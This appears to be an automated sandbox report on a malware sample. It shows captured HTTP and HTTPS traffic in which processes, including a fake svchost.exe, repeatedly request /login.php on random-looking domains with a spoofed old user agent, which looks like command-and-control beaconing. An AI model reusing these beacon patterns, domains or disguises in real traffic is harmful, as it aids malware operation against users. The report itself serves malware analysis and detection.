                                                                                                                                                                                                                  Data Ascii: x";imglog.src="http://galyqaz.com/sk-logabpstatus.php?a=dDZwczhKZjZ2Nis4Q0VjQlJDNzBLSlp6NER5cVFTSU9WOGNPL2tYQzREdE51Z2NTYjNQTGpwd3R0czl5OVVMdHc2YXRrOXU4OXRBaWJnVmRFRERUWWthV2t1eUx5a3RTVVg0cmllWS82RG53YkVmRTBVOE1NNUNNN0txN3lWREw=&b="+abp;docume


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  125192.168.2.65925091.195.240.19801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912707090 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.818945885 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:35 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:35 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819029093 CET1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                                  Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link576 rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819045067 CET1236INData Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78
                                                                                                                                                                                                                  Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819500923 CET636INData Raw: 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e
                                                                                                                                                                                                                  Data Ascii: lay:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819513083 CET1236INData Raw: 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73
                                                                                                                                                                                                                  Data Ascii: r-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbo
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819524050 CET1236INData Raw: 68 0d 0a 41 45 43 0d 0a 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35
                                                                                                                                                                                                                  Data Ascii: hAEC:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819538116 CET1236INData Raw: 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63
                                                                                                                                                                                                                  Data Ascii: okie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820456028 CET1236INData Raw: 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69
                                                                                                                                                                                                                  Data Ascii: or:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820472002 CET848INData Raw: 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2d 2d 74 77 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 2e 35 25 3b 68 65 69 67 68 74 3a 37 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68
                                                                                                                                                                                                                  Data Ascii: tent__container-ads--twot{margin-top:2.5%;height:700px}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820483923 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 34 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72
                                                                                                                                                                                                                  Data Ascii: ackground-position:0 40px}.container-content--twot .container-content__left{background-position-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-posit
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824218988 CET1236INData Raw: 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                                                                                                                  Data Ascii: ne}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line


                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.649730188.114.96.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:30 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYjD5X74qOdEklGm2TgwYtT9bq3EWWb4BCvF%2BnRchogNHSdhej9pB9Jh7ta%2BlMADXqtrDCASSTwrTGGp0%2Bf8aHA8x%2BwFzghe9jQApzVRlgsHMHyGWtBLbPHo0J5cqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020009fd00f95-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2549295&cwnd=250&unsent_bytes=0&cid=8cc85f375c19aca7&ts=897&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC420INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                                  Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70
                                                                                                                                                                                                                  Data Ascii: yle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta prop
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e
                                                                                                                                                                                                                  Data Ascii: on c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                                  Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                                  Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                                  Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                                  Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                                  Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                                  Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.649732188.114.96.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:32 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:32 UTC945INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:32 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
